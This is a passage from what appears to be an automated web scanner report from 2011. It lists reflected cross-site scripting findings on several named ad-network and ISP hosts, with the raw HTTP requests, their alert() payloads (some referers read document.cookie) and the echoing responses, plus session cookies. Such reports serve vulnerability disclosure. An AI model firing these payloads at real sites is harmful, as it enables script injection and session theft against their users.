HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Fri, 18 Feb 2011 15:28:03 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91045%3balert(1)//4c6e467d525 was submitted in the jscallback parameter. This input was echoed as 91045;alert(1)//4c6e467d525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback091045%3balert(1)//4c6e467d525 HTTP/1.1 Host: isp-planet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 12:51:03 GMT Age: 0 Connection: keep-alive Content-Length: 17207
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback091045;alert(1)//4c6e467d525({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.45. http://isp-planet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://isp-planet.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfdeb"-alert(1)-"613a5e49d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback0&cfdeb"-alert(1)-"613a5e49d69=1 HTTP/1.1 Host: isp-planet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 12:51:28 GMT Age: 0 Connection: keep-alive Content-Length: 17188
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... pleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.isp-planet.com/","cfdeb"-alert(1)-"613a5e49d69":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');} ...[SNIP]...
3.46. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://isp.thelist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4d0ed--><script>alert(1)</script>7894299f6b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?4d0ed--><script>alert(1)</script>7894299f6b8=1 HTTP/1.1 Host: isp.thelist.com Proxy-Connection: keep-alive Referer: http://www.thelist.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.1298033251
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:29 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 12:49:29 GMT Content-Type: text/html Content-Length: 46040
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /?4d0ed--><script>alert(1)</script>7894299f6b8=1 --> ...[SNIP]...
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 553d9<script>alert(1)</script>e9cc914bffe was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe&tr=ISPPLANET&num=4&layt=2&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 12:47:17 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 18 Feb 2011 12:47:17 GMT Content-Type: application/x-javascript Content-Length: 94
// Error: Unknown old section INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe
3.48. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6b94a<script>alert(1)</script>27ebc1b8b3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET&num=4&layt=2&fmt=simp&6b94a<script>alert(1)</script>27ebc1b8b3d=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 12:47:38 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 18 Feb 2011 12:47:38 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4ab45<script>alert(1)</script>d0043b82960 was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET4ab45<script>alert(1)</script>d0043b82960&num=4&layt=2&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.isp-planet.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 18 Feb 2011 12:47:19 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 18 Feb 2011 12:47:19 GMT Content-Type: application/x-javascript Content-Length: 84
// Error: Site 829 has no section ISPPLANET4ab45<script>alert(1)</script>d0043b82960
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 81194<script>alert(1)</script>27c159b7bd0 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K0878481194<script>alert(1)</script>27c159b7bd0 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://member.internet.com/index.php?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=772110218044714989 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=1a484aca566591c53c93394519ccf266; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d80b89b&0&&4d5a0212&383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d80b8c5&0&&4d5b746e&383df689f9c2c8ede3ba30f48f38e86; udm_0=MLvv9SUJKSpnph6paFnfVkA0rk1LefEuZz1z1LEsX/Bn9dRrr3caS5Nx+fYJSIW4iuuU7N6Uw2pXbGXpa69nRENbK/evRwRNI5S5VA0jvxc9TcILsqoEK11t9KZFBwEulYudXbr+iZm/eYBrb+PUSP2YAvwqfkTMMUZhdtDKhWgcV1D+U5c9Q9qdnwrfgsG2/QKxzpEtsVKDWTwOP/LUfCXRlVwzbcoFHckxFYuVuDN6aNGK/W5Vu5z2MZN9siois1hkvMp1NZmI1gq6XziIUrtKYezfU2eSd/Nxp8LXy6kqiny+txbR7oNILstLsVL3h805m9IjYpEEhmL3vzcEscbr3YZot9f9UK13KC7bX9jEtuEBNiFuRKPHEZBJp5GG3ktOGfLCfrWksr3WDOT5EvbYnKmh2szV4mXf9MZhD2CoDw+WJdDn/0XQm1byDqdVOgu/cOoPfRq7zqnnxAsU2h1MFZLG/vtW5eQCQGnjs0ALFtTkH04viQnm/KbFC3+iLwGoywcnXP6wsWzmuEwzSs6gGH2sz5ZWRZaUzCUVlYqNbwi3YhnkVMiGf2X61kbm5KwJEDiTs+ux2nxhXJZ5UIGRjE+/+XfRm9L0UDr7WXq4rGhfNob357RDVm6+I25hZeuGKFMe3kMuACzObiQDKMbFYMDli7GGaTt+jSX4sESdjOp5dkcrFprcF18pv+k6CUJq0F5hejKVhxCdj5Ls+oDhN51Vv9Zm6PoVLbH/AScPnoyU7iD9u6tW++3DT6vsPnL9/eIk9tbBBoo+ibw1nPIxS52JFqTZgLAKBBis+LDC+V62Gn1V/v92qZwAqggdKf2BVZVivi9qy5StWOcDl9kF1zn7Z1lQd81dOGcmlO91dREZZhbhmYiGuPbwsS8mOxMP9+SP17ftK7xYpCLNLXh9UTT6qo+1fS+oTdLZxfDR1M/lSs6924+o9/ByDNOzTcNjdKSZUPr75X2qBZJFQWBgopoKiqVbyBeob9mA3e6NDAes6j9PIoKEqEBV4gizjlQDoGhxtF5+szmWn4Cq0bqPz+FlxwSSQlyahAWrsrUiim355W8X8pVt4DfD6A==; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d80b99b&0&&4d59f17b&383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=pUPFOkPF7gMUFq3RgKwyVM+rackiy9FAEQLAqVwoHKDQKQUECTMJ3YH2aKvvUGIZ/k87dlTGDd9rmrYAbh0Ooo1h8N1EtRckRO8D+6zUXBYqtZsYeI3a3nZ/uKCMZlVcBQPHjipQg6Z/Y6xdJbQfIXEXDcuu0jXA0r4EqwZxAebO/H1rbq/oefPid9Abgjtgf1CcStKYcH9pekrGHDTaE0zblx/AXw==; rtc_0=MLsvrF8vcT5jJgGklT7AEDDwQw1KnSMm7aAOGlFl0Rl+KJT2a8F6YiRtSKwh7tchB2APQUwkRaHEYKxI6Ou1zujy8BRV5QH9T2a+M2zGjUX0Viz2yYzyqS+abJbtcJY1AwbkBwWSbrmXeIU8L72BbNEwFLUWnw4D3Y7Z6rQDk61zUtWFZ7FpYbBUhrPYiq8tMbpbnAwfLRKaokvXBfAxTtnkTG6wRnCUf8KvJJldcrEDXlft7E4UKO6JuUKNlWhu56+PoRacb0owT1rR7sedFEbW8MsH3Q==; rsi_us_1000000=pUMd5U+jOAQYbgln1lzSSFtZh+R6jR5rAnxq6o31aLucdIr+/fYe947NQq3oGGNC0Zybw/uBTme9mliOjVrpvW9lNHoIJpyFxXrnW0F9cX836eAs9iauj4qWIcHgL3TFQSA4Z73lqhE12hj3VtzYwKn5RuNOFP7LRbUwPz4hvnepGfgDfqaKm6X2n0jBEr09e5eqjeE4DMGp/EXx11RFPaTHKkydfd12P49fxntHNTIyRRsEHjsEcW0ZNZMQJflrWq6sAf7DgbAWDI3/Jnx+vyTQAJlhAu4mIiNyegI9axT1BuxdhS+919q1H97DZQ3w62bgBkDIYrXY5yQWXZWVejD6/z3ngANs7+FrE223fMrJvxQDoMoY1AHtEmGHWyShN0dYElwJGSqzSkDlCTGkUMGVzLubq3yr8f69CswpcrgOupv2uUWyPGDrXz+H/CH+yTqQRrJs/WX8eWf2B5whRHTQ5MyF5Fexs389R2H/mNLQT4EWR4ogCuCGbXwQqpvdz+F4b9AoViXg4/+yAwREakp5va0FEOKEK1iXnQHPS2qPxJ+QMdnr2WCWzNXFn/6T/1lv6ngf2MDVh/CQUC7RH8fki+WkYGAydtv98aqip51nFCv3HRw03+CFBgpQxvEefja90cfrQCaR3e7eLvOWMWKWKvIlhGlHENQ5cppXhDh7xw+XQtmSizFU+vYcBqwOxwBjqxLxnOzf2WnohHRaJJitjwAQKwt7VJuwGA/CMXXLCzDN7r67fBQq5flzHl6Z12s19p7KB/l8Yr0OhoFjqp6t+u/24QjbXs/toP7ywsjgCrEHD3CQS+bQOwR2zaiqlNFilQ2L/jmAeI6vhjCO1yca/zEJ5su8D6hT7YidV0X4waY/bVBJJ8e5ZwjbBWMv883XIC9h36CnTnbB5pwKO1P5OIvjtDRPNxxYR1HbpyQb7/mAwTKXbuSocx3ex6uAG5M=
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Fri, 18 Feb 2011 12:47:17 GMT Cache-Control: max-age=86400, private Expires: Sat, 19 Feb 2011 12:47:17 GMT X-Proc-ms: 0 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Fri, 18 Feb 2011 12:47:16 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "K0878481194<SCRIPT>ALERT(1)</SCRIPT>27C159B7BD0" was not recognized. */
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36dc8"%3balert(1)//cbe5ca11ae0 was submitted in the l parameter. This input was echoed as 36dc8";alert(1)//cbe5ca11ae0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D136dc8"%3balert(1)//cbe5ca11ae0&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081
Response
HTTP/1.0 200 OK Content-Type: text/plain Connection: close Content-Length: 1532
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a3b"-alert(1)-"30b7d04b7a was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0d2a3b"-alert(1)-"30b7d04b7a&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081
Response
HTTP/1.0 200 OK Content-Type: text/plain Connection: close Content-Length: 1515
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca4a"><script>alert(1)</script>3bbcce52da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /4ca4a"><script>alert(1)</script>3bbcce52da1?v=df32f76fa6fa8754bd6541fbadfecfe211e5e258bcf020cb52e7a9e01ff3686a0edfe7667c06596631975dce2bb7dde8d8d152e9f519c68a2e56c43d18985ca6 HTTP/1.1 Host: member.internet.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2143c"><script>alert(1)</script>236f6fe04f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b734%3balert(1)//79a8a9bd1be was submitted in the jscallback parameter. This input was echoed as 5b734;alert(1)//79a8a9bd1be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110218152309&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26010&mh=0f813f309d5cacd41f37cc296f7d04b3&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=c94d0e979f8311611a6d3feb87776715&pvu=B5833CD53518442CBC5E30D5B26FA9D2&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C363%3B674%2C813%3B475%2C1101%3B555%2C1208%3B517%2C1423%3B332%2C2148%3B&prf=ll%3A165%7Cintl%3A1453%7Cpreprochrome%3A1%7Cgetconchrome%3A81%7Ccontint%3A9875%7Ccontl%3A11414%7Cadvint%3A1390%7Cadvl%3A12804%7Ctl%3A12904&jscallback=$iTXT.js.callback95b734%3balert(1)//79a8a9bd1be HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:22:46 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Fri, 18 Feb 2011 15:22:46 GMT Age: 0 Connection: keep-alive
3.56. http://pdastreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pdastreet.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32ea6'-alert(1)-'e74a34b7216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=26010&32ea6'-alert(1)-'e74a34b7216=1 HTTP/1.1 Host: pdastreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 18 Feb 2011 15:21:35 GMT Age: 0 Connection: keep-alive Content-Length: 10599
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... c="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152135";})();$iTXT.js.serverUrl='http://pdastreet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26010&32ea6'-alert(1)-'e74a34b7216=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ef9b%3balert(1)//5afbc9e6ad4 was submitted in the jscallback parameter. This input was echoed as 6ef9b;alert(1)//5afbc9e6ad4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
